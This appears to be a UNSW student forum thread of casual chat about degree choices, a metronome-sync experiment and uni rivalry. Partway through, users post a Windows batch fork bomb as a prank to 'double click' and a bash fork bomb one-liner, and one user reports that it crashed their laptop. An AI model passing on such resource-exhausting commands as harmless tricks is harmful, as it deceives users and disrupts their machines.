• Want to help us with this year's BoS Trials?
    Let us know before 30 June. See this thread for details
  • Looking for HSC notes and resources?
    Check out our Notes & Resources page

general UNSW chit-chat (3 Viewers)

Omium

Knuckles
HSC
When i woke up today i realised something......

I remember a few months before my HSC finished i had Law as my first preference.

Then as i was with my teacher a few weeks post HSC, i simply switched my first preference with my third preference which was engineering.

In those few seconds, I changed the type of life i would've led for the next 25 years.

It makes you wonder. :cake:

tallkid34

In 25 words or less
HSC

I remember a few months before my HSC finished i had Law as my first preference.

Then as i was with my teacher a few weeks post HSC, i simply switched my first preference with my third preference which was engineering.

In those few seconds, I changed the type of life i would've led for the next 25 years.

I wouldn't have any regrets if I were you. From your intelligence and work ethic, you'll still probably going to win at life.

Omie Jay

gone
HSC
yea, i got a call when i got my uai, from uow, saying they'd accepted me into mechatronics at uow. then later on that day i got another call saying even tho im 2 points down they'd accept me into mechatron/sci double.

was gonna take out unsw from top place since i already got into uow.

then offers came, wtf unsw? IS THERE A MISTAKE? NO? LOL!

tallkid34

In 25 words or less
HSC
UNSW commerce/economics was my destiny. I didn't consider going to any other university and I'd even would have done arts just to go there.

I'd always hated my old school and couldn't care less about it. But I've got so much pride for my uni.

darkwolfzx

HSC
N/A

The strange thing was I was considering doing medical radiation science at Usyd in year 11. Then I decided to do computing, seeing I've always had a knack for breaking and fixing things with electronics and computers.

darkwolfzx

HSC
N/A
explain good sir how the above phenomena works, with a jargon level of approximately 4/10 :)

Dumsum

has a large Member;
HSC
So many unaccounted for variables in that experiment. Are the metronomes set to the same tempo? Are they otherwise identical?

to me there was only a period of maybe 2 secs where they were in sync

edit: on second viewing they never actually synced

Last edited:

Omium

Knuckles
HSC
So many unaccounted for variables in that experiment. Are the metronomes set to the same tempo? Are they otherwise identical?

to me there was only a period of maybe 2 secs where they were in sync

The dude that came to collect the experiment came early, i didn't want to keep him waiting for long, so as soon as they all clicked in i stopped it.

Also, they are all 100% identical.

I began all of them by pushing each individually with my finger.

I don't know exactly how the phenomena works but we are learning it soon (that what lecturer said at least).

Interestingly if the cylinders at the bottom are replaced by something stationary. i.e. bricks, it doesnt occur.
(me thinks its due to the natural oscillation of the system)

Omium

Knuckles
HSC
The last one is essentially in sync, if i get some more time with the experiment ill post an extended version.

You'll just have to take my word for it that they all lock up.

darkwolfzx

HSC
N/A
wanna try something cool?

open a new notepad file and type in the following

Code:
:s
start %0
%0|%0
goto :s
save the file as awesum.bat on your desktop and double click it. Much lulz will be had.

While you're waiting for it to start you might also consider reading how it works:
Fork bomb - Wikipedia, the free encyclopedia

Dumsum

has a large Member;
HSC

Code:
start %0
%0|%0
save the file as awesum.bat on your desktop and double click it. Much lulz will be had.

While you're waiting for it to start you might also consider reading how it works:
that was fun.

I did the bash version

Code:
:(){ :|:& };:

darkwolfzx

HSC
N/A
we did it on a cse computer once. It was funny until Loc showed up.

Then we decided to bail

Omie Jay

gone
HSC

Code:
start %0
%0|%0

wat did u do to my laptop :(

had to force shut down, then start up again to see if my baby was responding.

mabe i should've read that fork bomb link, instead of tl;dr'ing it, haha.

Uncle

Banned
HSC
The strange thing was I was considering doing medical radiation science at Usyd in year 11. Then I decided to do computing, seeing I've always had a knack for breaking and fixing things with electronics and computers.
usyd is about ... well ... 'all sorts of things'.
unless you know about the notorious geoffrey leonard you wont know what i mean.

explain good sir how the above phenomena works, with a jargon level of approximately 4/10 :)
at a macroscopic level (i.e. see with your own naked eye), the wood and cylinders dont move, but deep down at the microscopic level they actually vibrate at their own signature natural frequency.
then the pendulum after a while measures the average frequency of the wood and cylinders and therefore share the frequency.
me not physics like omium but meh...

too many commerce people it could become university of moneyland or viethailand.
moar scientists and engineers in unsw.
but not to the point it becomes MIT.

yea, i got a call when i got my uai, from uow, saying they'd accepted me into mechatronics at uow. then later on that day i got another call saying even tho im 2 points down they'd accept me into mechatron/sci double.

was gonna take out unsw from top place since i already got into uow.

then offers came, wtf unsw? IS THERE A MISTAKE? NO? LOL!
well on the other hand a uow student wanted to transfer to unsw.
DENIED.
*he cries*

The dude that came to collect the experiment came early, i didn't want to keep him waiting for long, so as soon as they all clicked in i stopped it.

Also, they are all 100% identical.

I began all of them by pushing each individually with my finger.

I don't know exactly how the phenomena works but we are learning it soon (that what lecturer said at least).

Interestingly if the cylinders at the bottom are replaced by something stationary. i.e. bricks, it doesnt occur.
(me thinks its due to the natural oscillation of the system)
lol you posted that shit in NS and no one knew what was happening.
are you able make them achieve unbounded resonance?
like actually measure the precise natural oscillation of the system then apply the same oscillatory period and then mayhem?

wat did u do to my laptop :(

had to force shut down, then start up again to see if my baby was responding.

mabe i should've read that fork bomb link, instead of tl;dr'ing it, haha.
lol thnx.
i was going to test that on my bro's comp to stop him from playing final fantasy.

Users Who Are Viewing This Thread (Users: 0, Guests: 3)